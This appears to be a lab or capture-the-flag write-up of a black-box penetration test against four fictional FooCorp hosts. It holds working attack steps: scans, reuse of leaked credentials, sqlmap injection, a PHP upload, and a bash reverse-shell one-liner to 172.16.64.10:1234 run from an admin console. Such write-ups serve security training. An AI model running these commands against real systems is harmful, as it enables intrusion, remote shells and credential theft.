Black Box Test #2

You have been engaged in a Black-box Penetration Test (172.16.64.0/24 range). Your goal is to read the flag file on each machine.

Prework

Connect to VPN

sudo openvpn black-box-penetration-test-2.ovpn

Scan network

sudo nmap -sn 172.16.64.0/24 --exclude 172.16.64.10 -oN hostAlive.nmap &&
cat hostAlive.nmap | grep for | awk {'print $5'} > ips.txt &&
sudo nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml &&
nmap2md.sh portScan.xml | xclip

Scanner

Generated on Mon Jul 12 18:49:14 2021 with nmap 7.91.

nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml

Hosts Alive (4)

HostOSAccuracy

172.16.64.81

Linux 3.16

95%

172.16.64.91

Linux 3.13

95%

172.16.64.92

Linux 3.12

95%

172.16.64.166

Linux 3.12

95%

Open Ports and Running Services

✔️172.16.64.81 (Linux 3.16 - 95%)

PortStateServiceVersion

22/tcp

open

ssh

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

80/tcp

open

http

Apache httpd 2.4.18

13306/tcp

open

mysql

MySQL 5.7.25-0ubuntu0.16.04.2

We found the following hosts in a host.bak file!

While inspecting sabrina's ssh account on ssh://sabrina:CHANGEME@172.16.64.166:222

172.16.64.81	cms.foocorp.io
172.16.64.81  static.foocorp.io
  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Dirbuster found the following route with potential credentials!

john1:password123
peter:youdonotguessthatone5

[Web] We get redirected trying to login with john1:password123 and we find the application leaks database credentials in its headers!

HTTP/1.1 302 Found
Date: Thu, 22 Jul 2021 23:05:39 GMT
Server: Apache/2.4.18 (Ubuntu)
X-DB-Key: x41x41x412019!
X-DB-User: root
X-DB-name: mysql
Location: 500.php
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
mysql --host=172.16.64.81 \ 
      --user=root \
      --password=x41x41x412019! \
      --port 13306 mysql

We find user credentials on the cmsbase.tbl_users table:

MySQL [cmsbase]> select user,password,name,email from tbl_users;
+---------+--------------------------------------------------------------+---------+-------------------+
| user    | password                                                     | name    | email             |
+---------+--------------------------------------------------------------+---------+-------------------+
| foocorp | $2a$08$f2fG8Ncpmj815xQ9U3Ylh.uD0VW/X6kOgjPIEHKP547jspS0FlHF6 | foocorp | admin@foocorp.io  |
| mickey  | $2a$08$w/oljwDbODAThUR4HTVO8eUjTabE80sH0i6xnOR97ZXfsGGmxohAW | mickey  | mickey@foocorp.io |
| donald  | $2a$08$dK04y0KEURxDv02vYRab1OMYMSWbW/bpGF.eAWrWv9JAGaa4yTxlq | donald  | donald@foocorp.io |
+---------+--------------------------------------------------------------+---------+-------------------+

Flag encountered! 😁

While inspecting database tables, we find our flag in the cmsbase.flag table.

select * from flag;
+----+------------------------------+
| id | content                      |
+----+------------------------------+
|  1 | Congratulations, you got it! |
+----+------------------------------+
1 row in set (0.141 sec)

✔️172.16.64.91 (Linux 3.13 - 95%)

PortStateServiceVersion

80/tcp

open

http

Apache httpd 2.4.18

6379/tcp

open

redis

Redis key-value store

This machine's domain name is http://75ajvxi36vchsv584es1.foocorp.io/ ****

This route should be added in the local /etc/host.

  • Target URL: http://172.16.64.91

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

A route to an app was discovered

Actions:

  • Fix upload form

  • Upload reverse shell

# Save a local file with this updated code for the form
# Notice the form action argument
<html><body style="background: black; color: white;">
<script src="http://75ajvxi36vchsv584es1.foocorp.io/app/js/auth.js"></script>
<center><div style="border: 1px yellow double">
<br /><br />
<form action="http://75ajvxi36vchsv584es1.foocorp.io/app/upload.php" method="post" enctype="multipart/form-data">
<br />Select  file to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload" name="submit">
</form>
<br /><br />
</div></center>
<hr /><br />
<center>&copy; FooCORP 2021</center>
<body></html>

Flag encountered through PHP reverse shell

$ cat flag.txt
Congratulations, you got this!
$ pwd
/var/www/html

✔️172.16.64.92 (Linux 3.12 - 95%)

PortStateServiceVersion

22/tcp

open

ssh

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

53/tcp

open

domain

dnsmasq 2.75

80/tcp

open

http

Apache httpd 2.4.18

63306/tcp

open

mysql

MySQL 5.7.25-0ubuntu0.16.04.2

  • Target URL: http://172.16.64.92

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Found secret url while inspecting footracking.js

alert("Loaded!");
<!-- pre-login collect data -->
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
		console.log("OK");
	} else {
		console.log("Error!");
	}

	xhr.open("GET", "http://127.0.0.1/72ab311dcbfaa40ca0739f5daf505494/tracking2.php", true);
	xhr.send("ua=" + navigator.userAgent + "&platform=" + navigator.platform);
}

Having found 72ab311dcbfaa40ca0739f5daf505494/tracking2.php URL leads to think there's another hidden tracking.php (without '2'), where an id url parameter can be passed:

Actions:

  • Try sqlmap

  • Scan new found directory with Gobuster/Dirbuster

sqlmap -u 'http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/tracking.php?id=6' --dbs

Found Credentials on MySQL database via sqlmap

| id | adm | password                                  | username  |
+----+-----+-------------------------------------------+-----------+
| 1  | yes | c5d71f305bb017a66c5fa7fd66535b84          | fcadmin1  |
| 2  | yes | 14d69ee186f8d9bbeddd4da31559ce0f          | fcadmin2  |
| 3  | no  | 827ccb0eea8a706c4c34a16891f84e7b (12345)  | tracking1 |
| 4  | no  | e10adc3949ba59abbe56e057f20f883e (123456) | tracking2 |
+----+-----+-------------------------------------------+-----------+

Not enough privileges when login into 72ab311dcbfaa40ca0739f5daf50549/login.php with tracking1/12345

Found credentials in webpage's source code

view-source:http://172.16.64.92/72ab311dcbfaa40ca0739f5daf505494/panel.php

<!-- = '127.0.0.1'; = 'dbuser'; = 'xXxyYyzZz789789)))'; = 'footracking'; = mysqli_connect(, , , );--><br />
dbuser
xXxyYyzZz789789)))
footracking

Actions:

  • Connect to new mysql database

  • Elevate privileges for tracking1 user

mysql --host=172.16.64.92 --user=dbuser --password='xXxyYyzZz789789)))' --port=63306

We now get into a Admin Console panel where we can inject PHP sentences

  • We initiate nc -lvpn 1234 locally

  • We open a reverse shell against our machine while we listen locally on port 1234

exec("/bin/bash -c 'bash -i >& /dev/tcp/172.16.64.10/1234 0>&1'");

We find a long DNS name on /etc/hosts while inspecting through our reverse shell

  • This is the last machine's IP to pwn.

www-data@dns: $ cat /etc/hosts

...
127.0.0.1    0pm6duqbu2o8ajzkjeai.foocorp.io
127.0.0.1    ttpxbpp88fgt9r3292ag.foocorp.io
172.16.64.91    75ajvxi36vchsv584es1.foocorp.io
127.0.0.1    9fys6zpn5k03zt299wyj.foocorp.io
127.0.0.1    uvq8daoyiuq75znffwvy.foocorp.io
127.0.0.1    qv0jwarev2y4lq69xy9w.foocorp.io
127.0.0.1    h1z07t1pujg9ti677md0.foocorp.io
...

Flag encountered

We find the flag while inspecting the remote filesystem through our reverse shell:

www-data@dns:/var/www$ cat flag.txt
cat flag.txt
Congratulations! You got it.

✔️172.16.64.166 (Linux 3.12 - 95%)

PortStateServiceVersion

2222/tcp

open

ssh

OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

8080/tcp

open

http

Apache httpd 2.4.18

[SSH] Warning about password policy

Employees are requested to change their default CHANGEME password.

ssh admin@172.16.64.166 -p 2222                                                                                                             130 ⨯
#################################################################
#       WARNING! This system is for authorized users only.      #
#       You activity is being actively monitored.               #
#       Any suspicious behavior will be resported.              #
#################################################################

~~~~ WORK IN PROGRESS ~~~~
Dear employee! Remember to change the default CHANGEME password ASAP.

admin@172.16.64.166's password: 
  • Target URL: http://172.16.64.166:8080

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

[Web] Found commented info for logged in users on the website's markup!

wget http://172.16.64.166:8080/about-us.htm
xmllint --html about-us.htm --xpath '//comment()'